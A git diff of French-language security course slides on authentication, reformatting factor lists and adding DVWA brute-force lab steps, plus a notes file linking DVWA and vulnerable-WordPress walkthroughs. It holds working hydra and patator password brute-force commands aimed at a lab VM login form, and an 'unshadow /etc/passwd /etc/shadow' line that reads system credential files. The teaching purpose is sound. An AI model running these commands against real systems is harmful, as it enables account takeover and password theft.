diff --git a/content/slides/1337/md/authentication.md b/content/slides/1337/md/authentication.md index fb295fa81da3635fc1df722dedfd7511fd77028c..8d73ace8483eb3bf6c1e546f767cfd247a84b6e4 100644 --- a/content/slides/1337/md/authentication.md +++ b/content/slides/1337/md/authentication.md @@ -12,14 +12,10 @@ ## preuves -* ce que je sais - * mot de passe, numéro d'identification personnel -* ce que je possède - * carte d'identité, carte à puce, certificat électronique, Token, Token OTP, périphérique -* ce que je suis - * photo, caractéristique physique, voire biométrie -* ce que je sais faire - * geste, signature +* **ce que je sais**: mot de passe, numéro d'identification personnel +* **ce que je possède**: carte d'identité, carte à puce, certificat électronique, Token, Token OTP, périphérique +* **ce que je suis**: photo, caractéristique physique, voire biométrie +* **ce que je sais faire**: geste, signature ## 2AF @@ -283,7 +279,7 @@ Note: * [CAS](http://www.apereo.org/cas) -*"Identity providers (IdPs) supply user information, while service providers (SPs) consume this information and give access to secure content"* +##### "Identity providers (IdPs) supply user information, while service providers (SPs) consume this information and give access to secure content" * [SAML](https://fr.wikipedia.org/wiki/SAML) [Shibboleth](images/authentication/Shibboleth.png) * [OpenID](https://openid.net/) @@ -316,30 +312,45 @@ Note: * [John the Ripper](http://www.openwall.com/john/) permet de générer des mots de passes dérivant de parties du username -## Brute force [Low] +## Brute force [low/medium] + +```shell +export security=low +export PHPSESSID=esiff3kfto23f7uit3vr90jks4 +``` ```shell hydra -l admin \ --P /usr/share/wordlists/rockyou.txt \ -vm-etu-vimazeno.local.isima.fr \ -http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=i2co2g99ve46qg39rf1bliic7h; security=low;:Username and/or password incorrect." + -P /usr/share/wordlists/rockyou.txt \ + vm-etu-vimazeno.local.isima.fr \ + http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=${PHPSESSID}; security=${security};:Username and/or password incorrect." ``` -* [THC Hydra](http://www.thc.org/thc-hydra/) - +* [THC Hydra](https://github.com/vanhauser-thc/thc-hydra) + * medium: sleep(2). Un peu plus long. -## Brute force [Low] + +## Brute force [medium] ```shell -patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 timeout=10 \ +export security=medium +export PHPSESSID=esiff3kfto23f7uit3vr90jks4 +``` + +```shell +patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 --rate-limit=2 timeout=10 \ url="http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" \ 0=/usr/share/wordlists/rockyou.txt \ - header="Cookie: security=low; PHPSESSID=i2co2g99ve46qg39rf1bliic7h" \ - resolve="vm-etu-vimazeno.local.isima.fr:10.16.41.197" \ #buggy version https://bytemeta.vip/repo/lanjelot/patator/issues/174 + header="Cookie: security=${security}; PHPSESSID=${PHPSESSID}" \ + resolve="vm-etu-vimazeno.local.isima.fr:10.16.41.197" \ -x ignore:fgrep='Username and/or password incorrect.' ``` * [patator](https://github.com/lanjelot/patator) + * resolv= -> buggy version https://bytemeta.vip/repo/lanjelot/patator/issues/174 + + +## Brute force [hard] ## attaques offline @@ -404,5 +415,5 @@ unshadow /etc/passwd /etc/shadow > mypasswd * [<i class="fa fa-desktop"></i> Se protéger avec de bons mots de passe](http://doc.m4z3.me/_/bpu/se_proteger_avec_de_bons_mots_de_passe.htm#/cover) * [<i class="fa fa-video-camera"></i> Se protéger avec de bons mots de passe](http://webtv.u-clermont1.fr/media-MEDIA150410174414391) -* mettre en place en deuxième facteur d'authentification +* mettre en place un deuxième facteur d'authentification * utiliser la crypto asymétrique diff --git a/notes.md b/notes.md index a5df8815b5e6bb80ff3a38010b82b0c4ea1d0954..17295ea3937dc9d0a0b5a172fa6b7ffc6f1e8363 100644 --- a/notes.md +++ b/notes.md @@ -4,6 +4,10 @@ default language in kali : https://www.youtube.com/watch?v=zCzxXc2SJ6Y firefox / burp suite / kali / https://www.youtube.com/watch?v=Uzy28osev5g simple api project / https://developer.okta.com/blog/2019/03/08/simple-rest-api-php +https://addons.mozilla.org/fr/firefox/addon/proxy-switcher-and-manager/ + https://github.com/onhexgroup/Vulnerable-WordPress + +https://sharpforce.gitbook.io/cybersecurity/walkthroughs/damn-vulnerable-web-application/damn-vulnerable-web-application-dvwa https://medium.com/@dannybeton/dvwa-brute-force-tutorial-low-security-463880d53e50 \ No newline at end of file